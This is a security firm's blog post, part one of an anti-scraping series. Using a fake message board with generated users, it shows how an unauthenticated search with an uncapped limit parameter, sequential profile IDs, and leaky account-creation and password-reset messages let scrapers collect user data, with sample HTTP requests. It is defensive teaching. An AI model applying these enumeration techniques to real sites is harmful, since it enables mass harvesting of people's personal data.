Anti-Scraping Part 1: Core Principles to Deter Scraping

Introduction and Motivations for Scraping

Scraping usually refers to the practice of utilizing automation to extract data from web applications. There are a multitude of motivations for scraping which range from hackers trying to amass a large amount of phone numbers and email addresses which they can sell, to law enforcement extracting pictures and user data from social media sites to assist in solving missing persons cases. Although there is a wide range of both well-intentioned and malicious reasons to scrape web applications, allowing vast amounts of user data to be extracted by third parties can result in regulatory fines, reputational damage, and harm to the individuals who had their data scraped.

Anti-Scraping refers to the set of tactics, techniques, and procedures intended to make scraping as difficult as possible. Although completely preventing scraping is probably not possible, requiring scrapers to spend an inordinate amount of time trying to bypass an application’s protections will most likely deter the average scraper.

Anti-Scraping Core Principles

In our view there are 5 core principles in Anti-Scraping:

Require Authentication
Enforce Rate Limits
Lock Down Account Creation
Enforce Data Limits
Return Generic Error Messages

These principles may look simple in theory but in practice are increasingly difficult with scale. Protecting an application on a single server with hundreds of users and a dozen endpoints is an approachable problem. However, dealing with multiple applications spread across global data centers with millions of concurrent users is an entirely different beast. Additionally, any of these principles taken too far can result in a hindrance to the user experience.

For example, enforcing rate limits sounds great on paper but exactly how many requests should the user be able to send per minute? If it’s too strict then it can result in a normal user being unable to use the application, which may be entirely unacceptable from a business perspective. Hopefully further diving into these topics can help illuminate both what solutions organizations can try to implement and what hurdles to expect along the way.

Fake Message Board

In this series of blogs, a fake message board site we developed will be utilized to demonstrate the back and forth between defenders hardening their application, and scrapers bypassing those protections. All the users and data shown in the application were randomly generated. The application has typical login, account creation, and forgotten password workflows.

Once signed into the application the user is shown 8 recommended posts. There is a search bar in the top right which can be used to find specific users.

Additionally, each user has a profile page which returns information about the user (name, email, bio, birthday, email, phone number) and their posts (date, content, comments).

No attempts were made to restrict scraping. Let’s see how complicated it is to scrape all 500,000 fake users on the platform.

The Scraper’s Perspective

One of a scraper’s first steps will be to proxy the traffic for the web application by using a tool like Burp Suite. The goal is to find endpoints that return or leak user data. In this case there a few different areas of the application to look at:

Recommended Posts Functionality
Search Bar
User Profile Pages
Account Creation
Forgot Password

Search Bar

The search bar by default returns 8 users related to the provided search term. As shown below, there are multiple interesting aspects to the /search endpoint.

HTTP Request:

POST /search?limit=8 HTTP/1.1
Host: 127.0.0.1:12345
[TRUNCATED] 

{"input":"t"}

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{ 
    "0": [ 
        "Valentin", 
        "Foster", 
        "vfoster166", 
        "7/13/1988", 
        "vfoster166@fake_yahoo.com", 
        "893183164" 
    ], 
    "4": [ 
        "Zion", 
        "Fuentes", 
        "zfuentes739", 
        "6/28/1985", 
        "zfuentes739@fake_gmail.com", 
        "905030314" 
    ],[TRUNCATED]

One of the first features to check is whether authentication is required. In this case the server still returns data even after removing the user’s session cookie. Additionally, any time there is a parameter which tells the server how much data to return that is potentially a great target for a scraper.

What happens if we increase the limit parameter from 8 to some higher value? Is there a maximum limit? As shown in the screenshot below, changing the limit parameter to 500,000 and searching for the value “t” results in 121,069 users being returned in a single response.

Example of adjusting the limit parameter from 8 to 500,000 to return 121,069 matches.

Is authentication required: No
How much data is returned: No max limit
What data is returned: User ID, name, username, birthday, email, phone number
Is the data easy to parse: Very easy, it’s just JSON

User Profile Pages

Visiting a user’s profile page returns information about the user, posts they have made, and comments on those posts.

HTTP Request:

GET /419101/profile/ HTTP/1.1
Host: 127.0.0.1:12345 
Cookie: session_cookie=60[TRUNCATED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

<div class="w3-margin-bottom" style="padding-bottom:30px;width:25%"> 
	<img src="/images/fake_profile_pictures/153.jpg" alt="Profile Picture" style="width:100%;height:300px"> 
	<h3>Ashton Weeks</h3> 
	<p class="w3-opacity">aweeks950</p> 
	<p><b>BIO: </b>People keep telling me "orange" but I still prefer "pink".</p> 
	<p>Birthday: 3/25/1980</p> 
	<p>Email: aweeks950@fake_outlook.com</p> 
	<p>Phone Num: 381801397</p> 
[TRUNCATED]

Since the user IDs are sequentially generated we can just start at user ID “1” and increment up until 500,000.

Is authentication required: Yes
How much data is returned: 1 targeted user and 3 commentors per post
What data is returned: User ID, name, username, bio, birthday, email, phone num
Is the data easy to parse: Pretty easy, it’s just in the HTML

Account Creation

The account creation functionality requires a username, email, password, and optionally a phone number.

HTTP Request:

POST /createAccount HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=test&email=test@test.com&phone=&password=[REDACTED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"response":"success"}

The server responds with a “success” message when given a new username/email/phone. What happens if a username/email/phone number is provided that is already in use by a user?

HTTP Request:

POST /createAccount HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=&email=&phone=893183164&password=[REDACTED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"response":"phone number taken"}

In this case an account is already using the phone number “893183164” and the server leaks that information. Although this endpoint doesn’t return user data, it still leaks information. This can be utilized by a scraper to, for example brute force all possible phone numbers and collect a list of all numbers used by users on the platform.

Additionally, since there appears to be no protections on the account creation workflow, we can create a ton of fake accounts which can then be used for future scrapes.

Forgot Password

The forgot password functionality requires a username and sends a recovery email/sms if the account exists.

HTTP Request Valid User:

POST /forgotPassword HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=vfoster166

HTTP Response Valid User:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"success":"email sent to vfoster166@fake_yahoo.com"}

Observe that if a valid username is provided then the server returns the email address of the account. This can be utilized by scrapers to collect email addresses by either brute forcing usernames or collecting usernames from elsewhere in the application. For reference, if an invalid username is provided then the server returns an error message as shown below.

HTTP Request Invalid User:

POST /forgotPassword HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=doesnotexist

HTTP Response Invalid User:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"error":"Invalid Username"}

Conclusion

Let’s review how the Fake Message Board application is performing with respect to our 5 core anti-scraping principles.

Require Authentication
- The /search endpoint is accessible logged-out
Enforce Rate Limits
- Rate limiting is nonexistent throughout the application
Lock Down Account Creation
- There are no protections in place
Enforce Data Limits
- The /search endpoint accepts a “limit” parameter with no maximum enforced value
Return Generic Error Messages
- The /createAccount and /forgotPassword endpoints both leak information through error messages

With no protections in place, scraping all 500,000 fake users of the application can be trivially done in minutes with only a few requests. In part two we’ll begin implementing anti-scraping protections into the application and examine how scrapers can adapt to those changes.

The CISO’s Guide to Securing AI/ML Models

Gut Check: Are You Getting the Most Value out of Your Penetration Testing Report?

Hudl teams up with NetSPI to validate its proactive security program

Chubb partners with NetSPI to bring attack surface management to its policyholders

Partner with NetSPI

Anti-Scraping Part 1: Core Principles to Deter Scraping

Noah Dunn

Introduction and Motivations for Scraping

Anti-Scraping Core Principles

Fake Message Board

The Scraper’s Perspective

Recommended Posts Functionality

Search Bar

User Profile Pages

Account Creation

Forgot Password

Conclusion

Explore more blog posts

Penetration Testing: What is it?

Ransomware Prevention, Detection, and Simulation

How to Use Attack Surface Management for Continuous Pentesting

The CISO’s Guide to Securing AI/ML Models

Gut Check: Are You Getting the Most Value out of Your Penetration Testing Report?

Hudl teams up with NetSPI to validate its proactive security program

Chubb partners with NetSPI to bring attack surface management to its policyholders

Partner with NetSPI

Anti-Scraping Part 1: Core Principles to Deter Scraping

Noah Dunn

Introduction and Motivations for Scraping

Anti-Scraping Core Principles

Fake Message Board

The Scraper’s Perspective

Recommended Posts Functionality

Search Bar

User Profile Pages

Account Creation

Forgot Password

Conclusion

Explore more blog posts

Penetration Testing: What is it?

Ransomware Prevention, Detection, and Simulation

How to Use Attack Surface Management for Continuous Pentesting

This website uses cookies